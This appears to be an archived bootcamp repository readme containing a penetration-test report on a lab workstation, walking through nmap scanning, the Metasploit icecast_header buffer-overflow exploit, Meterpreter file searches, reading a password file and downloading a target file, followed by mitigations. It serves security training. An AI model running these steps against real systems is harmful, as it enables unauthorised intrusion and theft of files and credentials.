This repository has been archived by the owner on Apr 5, 2022. It is now read-only.

Tamie13/Penetration-Testing-Week-2
GoodSecurity Penetration Test Report

TamieBoychuk@GoodSecurity.com

29 March 2022

High-Level Summary

GoodSecurity was tasked with performing an internal penetration test on GoodCorp’s CEO, Hans Gruber. An internal penetration test is a dedicated attack against internally connected systems. The goal of this test is to perform attacks similar to those of a hacker and attempt to infiltrate Hans’ computer to determine whether it is at risk. GoodSecurity’s overall objective was to exploit any vulnerable software, find a secret recipe file on Hans’ computer, and report the findings back to GoodCorp. The internal penetration test found several alarming vulnerabilities on Hans’ computer: when performing the attacks, GoodSecurity was able to gain access to his machine and find the secret recipe file by exploiting two programs with major vulnerabilities. The details of the attack are below.

Findings

  • Machine IP:

    • Machine’s IP address = 192.168.0.20
  • Hostname:

    • Actual name of the machine = MSEDGEWIN10
  • Vulnerability Exploited:

    • The name of the script or Metasploit module used: exploit/windows/http/icecast_header. This module allows an attacker or threat actor to gain remote control of a victim's system by exploiting a buffer overflow that overwrites memory on the victim's system using the "icecast" flaw. The flaw allows writing past the end of a pointer array when the server receives more than 32 characters (header lines).
  • Vulnerability Explanation:

    • If you use audio streaming services like Spotify then you have used Icecast. It is a streaming media server used by radio stations, online music streaming and other similar platforms that let you create lists of your favourite music and listen to them anywhere at any time. The Icecast flaw is used by attackers and/or threat actors to inject malicious code through the Icecast buffer overflow. The Icecast server allows a maximum of 32 characters (aka headers) in the client's HTTP request. If the request is longer than that, the excess overflows onto the stack, where it fills the buffers beyond what was allocated. Part of this buffer overflow process is the Extended Instruction Pointer (EIP), which holds the memory address of the next instruction to execute. It is through the EIP that an attack is able to be executed: once the overflow fills the allocated buffers it overwrites the EIP address space, and if it overwrites the EIP with a new return pointer it tells the CPU to jump to an address containing instruction code, which is then executed. That is where malicious code or an unwanted process can be executed by an attacker.
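An added illustration of the bounds check the flaw described above lacks. This is not Icecast's source and not part of the original report: it models header lines being collected into a fixed array of 32 pointers, and the hardened parser rejects a request carrying more lines than that instead of writing past the array. The function names and the 4096-byte scratch buffer are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative model (assumption: not Icecast's own code) of the bug class
 * described above: header lines are kept as pointers in a fixed array of
 * MAX_HEADERS entries, so extra lines would write past it without a check. */
#define MAX_HEADERS 32

/* Hardened parser: splits a CRLF-separated header block in place. Returns the
 * number of headers stored, or -1 when there are more than MAX_HEADERS lines. */
int parse_headers_safe(char *req, char *lines[MAX_HEADERS])
{
    int count = 0;
    char *p = req;
    while (p != NULL && *p != '\0') {
        char *eol = strstr(p, "\r\n");
        if (eol != NULL) *eol = '\0';      /* terminate this line */
        if (*p == '\0') break;             /* empty line ends the header block */
        if (count >= MAX_HEADERS) return -1; /* reject instead of overflowing */
        lines[count++] = p;
        p = (eol != NULL) ? eol + 2 : NULL;
    }
    return count;
}

/* Wrapper for a read-only request: copies it into a bounded scratch buffer
 * (4096 bytes, an assumption) before parsing. Returns -1 if it does not fit. */
int check_request(const char *request)
{
    char buf[4096];
    char *lines[MAX_HEADERS];
    if (strlen(request) >= sizeof buf)
        return -1;
    strcpy(buf, request);
    return parse_headers_safe(buf, lines);
}

/* Constructed sample input: builds a request with n "X-H<i>: v" header lines
 * followed by the blank terminator line, then runs it through check_request. */
int constructed_request_headers(int n)
{
    char buf[4096];
    size_t used = 0;
    for (int i = 0; i < n && used + 32 < sizeof buf; i++)
        used += (size_t)snprintf(buf + used, sizeof buf - used, "X-H%d: v\r\n", i);
    snprintf(buf + used, sizeof buf - used, "\r\n");
    return check_request(buf);
}
```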

Click Here For Full Extract On Information Above

Severity:

The severity of this attack according to CVE was scored at 7.5, highlighting that the compromise of confidentiality, integrity and availability is considerable.

Click Here For CVE Details

Proof of Concept:

After receiving written permission from GoodCorp Inc., a security test was run against the CEO's workstation. The following highlights the steps taken to complete the test and the vulnerabilities found during testing.

A service and version scan was run first using nmap to determine the services and versions running on the system. The scan was specifically looking for a version of Icecast running on the network.

  • Command used: nmap -sV 192.168.0.20
    • nmap = network scanner
    • -sV = specification to run a service and version scan
    • 192.168.0.20 = target the scan is being run against (the CEO's workstation IP address)

[screenshot not reproduced]

Above you can see that the Icecast service was running on the machine, and which version was running. The next step was to search the local exploit database for any Icecast exploits.

  • Command used: searchsploit icecast
    • searchsploit = security assessment tool for searching offline repositories
    • icecast = exploit/s being searched for

[screenshot not reproduced]

Above you can see there are multiple Icecast exploits available.

Next, penetration testing software called Metasploit was used to continue testing. The two images below demonstrate the ability to load and use Metasploit to find Icecast module/s to use against the target.

  • Command To Start Metasploit: msfconsole
  • Command To Search For Module: search icecast

[screenshot not reproduced]

A more generic search focused on the word cast was also run to compare the search results (see below):

  • Command To Search For Just 'cast': search cast

[screenshot not reproduced]

  • Module Found In Both Searches = exploit/windows/http/icecast_header

To load the module for the exploit you can use the entire path of the module found, or the number in front of the module, as seen in the image above.

  • Command To Use Entire Path Module = use exploit/windows/http/icecast_header
  • Command Using Just Number = use 23

Before running the exploit, the receiving host of the exploit needs to be set.

  • Command To Set RHOST = set RHOST 192.168.0.20
    • The receiving host or RHOST is the CEO's IP Address

After setting the RHOST the exploit was run (see below).

  • Command To Run The Icecast Exploit = exploit

[screenshot not reproduced]

As can be seen above, the exploit was successful and an open session was established with the target, the CEO's workstation.

The next part of the security test was to see whether files whose names contain the strings recipe or secretfile could be found.

  • Command To Search For secret Text File = search -f *secret*.txt
    • search = command to run a search
    • -f = indicates that the search is for a file
    • *secret*.txt = pattern matching any text file whose name contains the word secret

[screenshot not reproduced]

As can be seen above, the command was successful in finding a file whose name contains secretfile.txt and revealed the path to the file.

  • Command To Search For recipe Text File = search -f *recipe*.txt
    • search = command to run a search
    • -f = indicates that the search is for a file
    • *recipe*.txt = pattern matching any text file whose name contains the word recipe

[screenshot not reproduced]

Again, the search was successful in finding a file containing the word recipe as well as the path to the file.

From the root directory we changed into the directory where Drinks.recipe.txt was found.

Once in the directory we read the contents of the file.

  • Command To Open & Read File = cat Drinks.recipe.txt (see results below)

[screenshot not reproduced]

Taking the security testing further, we were able to exfiltrate Drinks.recipe.txt by downloading it from the CEO's workstation back to the attacker machine.

  • Command To Exfiltrate & Download Recipe = download 'c:\Users\IEUser\Documents\Drinks.recipe.txt'

[screenshot not reproduced]

The file was successfully stolen from the CEO's computer as can be seen above.

To solidify the legitimacy of the security testing and highlight the vulnerabilities found, additional security testing was run against the CEO's workstation.

  • It should be noted that no other IP addresses were exploited and no changes were made to files or the configuration of the CEO's workstation during this testing.

To find other possible exploits, the local workstation was searched:

  • Command To Use Exploit Suggester = run post/multi/recon/local_exploit_suggester

[screenshot not reproduced]

Two additional vulnerabilities were found using this command, as can be seen above, but were not run against the CEO's workstation. The reason these vulnerabilities were not exploited is that the instructions for this security test explicitly stated that no configuration changes to the workstation would be allowed, and both exploits attempt to make some level of change to those types of settings.

  • Click Here for additional information about exploit/windows/local/ms16_075_reflection, also known as CVE-2016-3225
  • Click Here for additional information about exploit/windows/local/ikeext_service

The directory path for both Drinks.recipe.txt and User.secretfile.txt revealed other sensitive files that could be accessed as well, including a password file.

  • Command To See Files In Current Directory = ls
  • Command To See Contents Of File = cat password.txt

[screenshot not reproduced]

  • Command To Enumerate All Logged In Users = run post/windows/gather/enum_logged_on_users

[screenshot not reproduced]

  • Command To Open A Meterpreter Shell = shell

[screenshot not reproduced]

  • Command To Display Target Computer System Information (run from the c:\Users\IEUser\Documents directory) = systeminfo

[screenshot not reproduced]

Mitigation Strategies & Recommendations

  • Update to Icecast 2.0.2 or later
  • Revisit password policies and provide training on how to create complex passwords that would be difficult to break
  • Consider additional security testing and adding security HTTP headers to prevent vulnerabilities

About

Unit 17 Cybersecurity Bootcamp Penetration Activity.
